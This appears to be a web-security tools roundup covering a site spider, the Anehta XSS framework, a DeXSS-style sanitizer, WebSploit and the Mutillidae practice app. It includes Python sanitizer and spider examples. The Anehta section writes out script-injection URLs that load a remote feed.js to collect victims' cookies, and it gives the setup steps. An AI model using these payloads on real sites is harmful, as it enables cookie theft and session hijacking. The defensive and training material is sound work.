sitecheck : Modular web site spider for web developers.

Spiders a website and logs many common problems, including missing resources (HTTP 4xx, typically 404), server errors (HTTP 5xx), slow pages, looping redirects, missing meta tags, duplicate content and potential SQL injection/cross-site scripting (XSS) vulnerabilities.

Various informational modules are also available, including the logging of email addresses, IP addresses, comments in the HTML, spelling mistakes, W3C validation errors, accessibility issues, and low scores on the Flesch Reading Ease test.

Features

  • Authentication by HTTP form submission
  • Suspend and resume
  • Download and save a site
  • Highly configurable with support for multiple profiles
  • Modular processing of responses
  • Checks for some common DNS issues
  • Includes inbound links from search engines

Download Right Here | read more in here

Anehta V-0.6 released.

Anehta is a PHP web application for security auditing; in practice it is an XSS exploitation framework: a feed.js script injected into a vulnerable page reports back to the Anehta server, which collects what the victim browser (an "XSS slave" in Anehta's terms) returns.


=== Environment ===
1. PHP 4 or 5 (PHP 5 recommended)
2. Apache or IIS
=== Install & Configure ===
1. Extract all files into a directory on your server.
2. Make sure the web server can write to that directory.
3. Set $U (username) and $P (password) in "server/class/auth_Class.php".
The default username is "admin" and the default password is "123456"; change them before the server is reachable by anyone else, since admin.php exposes everything the tool collects.
4. If you want to send mail, point "server/mail.php" at your own mail server or mailbox.
=== Quick Start ===
1. Log in and open the Configure tab.
2. Set "anehtaurl" to the URL where your Anehta install lives.
For example: "http://www.a.com/anehta".
3. Also set the boomerang src and the boomerang target.
The boomerang src is normally the page that carries your injected feed.js.
For example: "http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>".

The boomerang target is the page on the other domain whose cookies you want to collect; it must itself be injectable with feed.js.
For example: "http://www.alimafia.com/xssDemo.html#'><script src=http://www.a.com/anehta/feed.js></script><'".

If you do not want to use boomerang, edit feed.js and disable the xcookie module.
Even then, the boomerang src and target fields must be filled in whenever you save the Configure tab.
Only cookies readable from script are collected this way: a cookie set with the HttpOnly flag is not exposed through document.cookie.

4. After saving the configuration, load feed.js as an external script from the page where your XSS is.
A demo page, "demo.html", is included in the directory.

5. Refresh admin.php; a new entry appears once a browser running your injected feed.js reports back.

Download here | Read more here


DeXSS

DeXSS provides a SAX2 Parser to help protect against Cross-site scripting (XSS) attacks. DeXSS uses TagSoup to parse potentially malformed input, followed by a SAX2 filter pipeline to remove JavaScript from HTML. You can use the DeXSS parser in place of your existing SAX2 parser, or you can use the DeXSS utility to provide a string-to-string conversion.
Release Notes 1.2, 12 Jun 2012: This release adds a CSS sanitizer, uses the OSBCP CSS Parser, canonicalizes CSS in the style attribute, and attempts to remove javascript: and expression(). Inline <style> CSS is still elided.
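The pipeline DeXSS describes (parse tolerantly, then strip scripts, event handlers, script-scheme URLs and dangerous CSS before re-serializing) can be shown with Python's event-driven html.parser standing in for TagSoup/SAX2. This is an added example, not DeXSS's code or API; the tag and attribute allow-lists and the CSS block-list are assumptions chosen for illustration.

```python
# Added example: an event-driven HTML/CSS sanitizer in the spirit of DeXSS
# (tolerant parse -> filter events -> re-serialize). Not DeXSS's code; DeXSS is
# Java on TagSoup/SAX2. The allow-lists below are assumptions for the example.
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "ul", "ol", "li", "span", "div"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "span": {"style"}, "div": {"style"}, "p": {"style"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}   # element and its text are both elided
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):")
CSS_DANGEROUS = re.compile(r"expression\(|javascript:|vbscript:|url\(|@import|behavior:|binding:")


def safe_url(value):
    """Return the URL if it is relative or uses an allowed scheme, else None.
    Control characters and whitespace are removed first: browsers ignore them
    inside the scheme ("java\\tscript:" still runs), and the parser has already
    decoded entities such as &#x09; for us."""
    if value is None:
        return None
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    match = SCHEME_RE.match(cleaned.lower())
    if match and match.group(1) not in SAFE_SCHEMES:
        return None
    return cleaned


def safe_css(value):
    """Keep only style declarations that are still harmless after canonicalisation:
    comments and whitespace are stripped before matching, and a declaration that
    uses CSS backslash escapes is rejected rather than decoded."""
    if value is None:
        return None
    kept = []
    for decl in value.split(";"):
        decl = decl.strip()
        if not decl or "\\" in decl:
            continue
        canon = re.sub(r"/\*.*?\*/", "", decl, flags=re.S)
        canon = re.sub(r"\s+", "", canon).lower()
        if CSS_DANGEROUS.search(canon):
            continue
        kept.append(decl)
    return "; ".join(kept) if kept else None


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return   # unknown element dropped; its text content still flows through
        parts = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS:
                value = safe_url(value)
            elif name == "style":
                value = safe_css(value)
            if value is None:
                continue
            parts.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(parts)))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))   # text is re-escaped on output


def sanitize(html):
    parser = Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

The design choice worth copying from DeXSS is that filtering happens on parser events after the tolerant parse, so malformed markup cannot smuggle a tag past a regex; the output is rebuilt from the allow-listed events rather than edited in place.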


Download and read more: http://dexss.org/

HTML5 Top 10 Threats Stealth Attacks and Silent Exploit

Abstract: HTML5 is an emerging stack for next-generation applications. It extends browser capabilities and can run Rich Internet Applications within the modern browser architecture; it also runs on mobile devices, which complicates the picture further. HTML5 is not a single technology but a combination of components such as XMLHttpRequest (XHR), the Document Object Model (DOM), Cross-Origin Resource Sharing (CORS) and enhanced HTML/browser rendering. It brings several technologies to the browser that were not there before: localStorage, WebSQL, WebSockets, Web Workers, enhanced XHR and DOM-based XPath, to name a few. Together they enlarge the attack surface and the points of exploitation available to attackers and malicious agents. By leveraging these vectors one can craft stealth attacks and silent exploits that are hard to detect and easy to compromise with… Read more here [PDF format]

Resources: https://media.blackhat.com/

sitecheck v1.4 – Modular web site spider for web developers.

Checks for many common problems, including missing documents (HTTP 4xx, typically 404), server errors (HTTP 5xx), spelling mistakes, W3C validation errors, accessibility issues, missing meta tags, duplicate content, inbound links from search engines and potential SQL injection/cross-site scripting (XSS).
Features

  • Authentication by HTTP form submission
  • Suspend and resume
  • Download and save a site
  • Highly configurable
  • Modular design
  • Checks for some common DNS issues
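Both sitecheck entries on this page list the same core checks: spider the site, log 4xx/5xx responses and catch looping redirects. As an added example, not sitecheck's own code, here is a minimal Python spider that implements those three checks over a constructed in-memory site; fetch(), the sample URLs and the site.test host are assumptions made so the example runs offline.

```python
# Added example (not sitecheck's code): a minimal spider over a constructed
# in-memory site that follows links, logs client errors (4xx) and server errors
# (5xx), and detects redirect loops. fetch() stands in for an HTTP client.
import re
from collections import deque
from urllib.parse import urljoin, urlparse

MAX_REDIRECTS = 10
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
HREF_RE = re.compile(r'href="([^"]+)"', re.I)

# Constructed sample site: url -> (status, headers, body)
SAMPLE_SITE = {
    "http://site.test/": (200, {}, '<a href="/about">About</a> <a href="/old">Old</a> '
                                  '<a href="/loop">Loop</a> <a href="/missing">?</a> '
                                  '<a href="/broken">!</a> <a href="http://other.test/">Ext</a>'),
    "http://site.test/about": (200, {}, '<a href="/">Home</a>'),
    "http://site.test/old": (301, {"Location": "/about"}, ""),
    "http://site.test/loop": (302, {"Location": "/loop2"}, ""),
    "http://site.test/loop2": (302, {"Location": "/loop"}, ""),
    "http://site.test/broken": (500, {}, "internal error"),
}


def fetch(url):
    """Stand-in for an HTTP GET; anything not in the sample site is a 404."""
    return SAMPLE_SITE.get(url, (404, {}, "not found"))


def resolve(fetch, url, max_redirects=MAX_REDIRECTS):
    """Follow redirects from url. Returns (final_url, status, body, chain), where
    status is an int, or the string "redirect-loop" / "too-many-redirects"."""
    chain = [url]
    seen = {url}
    while True:
        status, headers, body = fetch(url)
        if status not in REDIRECT_STATUSES or "Location" not in headers:
            return url, status, body, chain
        nxt = urljoin(url, headers["Location"])   # Location may be relative
        if nxt in seen:
            return url, "redirect-loop", "", chain + [nxt]
        if len(chain) > max_redirects:
            return url, "too-many-redirects", "", chain
        chain.append(nxt)
        seen.add(nxt)
        url = nxt


def check_site(fetch, start):
    """Breadth-first spider restricted to start's host; returns a list of
    (url, problem, detail) findings."""
    host = urlparse(start).netloc
    findings = []
    queue = deque([start])
    seen = {start}
    while queue:
        url = queue.popleft()
        final, status, body, chain = resolve(fetch, url)
        if status in ("redirect-loop", "too-many-redirects"):
            findings.append((url, status, " -> ".join(chain)))
            continue
        if 400 <= status < 500:
            findings.append((url, "client-error", str(status)))
            continue
        if status >= 500:
            findings.append((url, "server-error", str(status)))
            continue
        for href in HREF_RE.findall(body):
            link = urljoin(final, href)
            if urlparse(link).netloc != host:
                continue   # off-site links are not spidered
            if link not in seen:
                seen.add(link)
                queue.append(link)
    return findings
```

The loop check keys on the set of URLs already visited within one redirect chain rather than on a hop count alone, so a two-page A -> B -> A loop is reported on the second hop instead of after the hop limit; the hop limit still catches chains that never repeat a URL.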
For installation and usage, see README.txt.

Platform : Windows & Linux

Download :
Windows : sitecheck-1.4.zip (36.8 KB) | Linux : sitecheck-1.4.tar.gz (31.8 KB)

Find other versions

Read more: http://sitecheck.sourceforge.net/

Update: WebSploit V1.3 – open source tool for vulnerability scanning and analysis

WebSploit is an open source project for scanning and analysing remote systems for vulnerabilities.

Description:
[+] Autopwn – uses Metasploit to scan and exploit the target's services
[+] wmap – scans and crawls the target with the Metasploit wmap plugin
[+] format infector – injects reverse and bind payloads into file formats
[+] phpmyadmin – searches for the target's phpMyAdmin login page
[+] lfi – scans for local file inclusion vulnerabilities and attempts to bypass some WAFs
[+] apache users – enumerates per-user directories on the server (if it runs Apache)
[+] Dir Bruter – brute-forces target directories with a wordlist
[+] admin finder – searches for the target's admin and login pages
[+] MLITM Attack – Man Left In The Middle, XSS phishing attacks
[+] MITM – Man In The Middle attack


Platform : Unix/Linux

Download V1.3 : websploit-v 1.3.zip (1.1 MB)

Find other versions | Read more: http://code.google.com

Update: Mutillidae V2.1.16 – Mutillidae Web Pen-Test Practice Application (OWASP Top 10)

Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMPP, making it easy for users who do not want to install or administer their own web server. It is already installed on Samurai WTF; simply replace the existing version with the latest one on Samurai. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them, providing an easy-to-use web hacking environment deliberately designed as a hack lab for security enthusiasts, for classroom labs, and as a target for vulnerability assessment tools. Mutillidae has been used in graduate security courses, in corporate web security training courses, and as an "assess the assessor" target for vulnerability scanners.

Mutillidae has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, BackTrack, HP WebInspect, Burp Suite, NetSparker Community Edition, and other tools.

Change Log for Mutillidae 2.1.16:

  • Additional hints added to the HTML5 Web Storage page on overwriting the current web storage
  • Additional hints added to the HTML5 Web Storage page on reading the current web storage, with code examples for document.write and the Firebug command line
  • Several new items added to the Easter egg file Mutillidae-Test-Scripts.txt
  • New vulnerability: the HTML5 Storage page now has cross-site scripting via DOM injection; the "storage key" field is the injection point
  • Hints about DOM injection added to the HTML5 Storage page
  • Hints about cross-site scripting added to the capture-data.php page
  • Vulnerabilities listing updated
Platform : Windows & Linux

Download : LATEST-mutillidae-2.1.16.zip (7.1 MB)

Read more: http://www.irongeek.com